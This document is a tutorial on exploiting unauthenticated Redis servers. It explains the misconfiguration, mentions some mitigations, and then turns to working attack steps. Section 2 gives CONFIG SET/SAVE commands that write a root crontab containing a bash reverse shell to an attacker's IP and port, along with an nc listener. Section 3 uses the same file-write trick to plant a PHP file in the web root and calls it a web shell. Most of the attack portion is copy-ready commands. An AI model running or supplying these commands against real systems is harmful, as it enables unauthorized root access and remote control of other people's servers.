1. Vulnerability Introduction
Redis listens on TCP port 6379. When the bind directive is absent or set to 0.0.0.0 and protected mode is off, it listens on every interface, so a host with no firewall rule restricting 6379 to trusted addresses exposes Redis to the public network. Redis ships with no password (requirepass is empty), so in that configuration anyone who can reach the port can issue arbitrary commands and read all stored data. Redis 3.2 and later ship a redis.conf that binds 127.0.0.1 and sets protected-mode yes; the exposure described here arises when those defaults are changed, which is common in container and quick-start deployments. Setting requirepass and, where CONFIG is not needed remotely, disabling it with rename-command CONFIG "" closes the avenues used below.
Beyond reading data, an attacker can abuse the CONFIG command to turn Redis persistence into an arbitrary file write: CONFIG SET dir and CONFIG SET dbfilename choose where the RDB snapshot lands, SAVE writes it, and any string the attacker has stored is embedded in it. With the Redis process running as root, that is enough to drop an SSH public key into /root/.ssh/authorized_keys and log in, add a scheduled task, write a web shell, and so on. The written file also contains the RDB header and binary metadata, so the technique only works where the program that consumes the file tolerates garbage around the injected lines.
The following steps assume a Redis instance that is reachable without authentication, as described above.
2. Using Scheduled Tasks to Reverse Shell
Connection tools (a Windows GUI client and a Windows build of redis-cli; on Linux, redis-cli -h <target> from the redis package works just as well):
https://github.com/caoxinyu/RedisClient/releases
https://github.com/dmajkic/redis/downloads
Connect to the vulnerable Redis instance and run the following commands. Replace IP Address and Port with the listener you control; the leading and trailing \n keep the crontab entry on a line of its own, away from the binary RDB data written around it:
set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
This writes /var/spool/cron/root, which is root's crontab on CentOS/RHEL, so the Redis process must run as root; if config set dir answers "ERR Changing directory: Permission denied", it does not. On Debian and Ubuntu, user crontabs live in /var/spool/cron/crontabs/ and their cron refuses a crontab file that contains the RDB binary, so this method fails there and the web-shell approach in the next section is the usual alternative. Once the file is written, cron runs the line every minute, so start the listener locally first:
nc -lvnp Port
3. Writing a Web Shell in Redis
The same write primitive aimed at the web root. The Redis process needs write access to that directory, and the web server must execute PHP files placed there:
config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save
Requesting /test123.php on the target then runs the embedded PHP; the RDB header and metadata around it are echoed back as raw bytes but do not stop execution. Padding the value with \n\n on both sides, as in the cron example, keeps the PHP tags clear of that binary data. Check config get dir and config get dbfilename before changing them and restore the original values afterwards, otherwise the next periodic snapshot is written into the web root as well.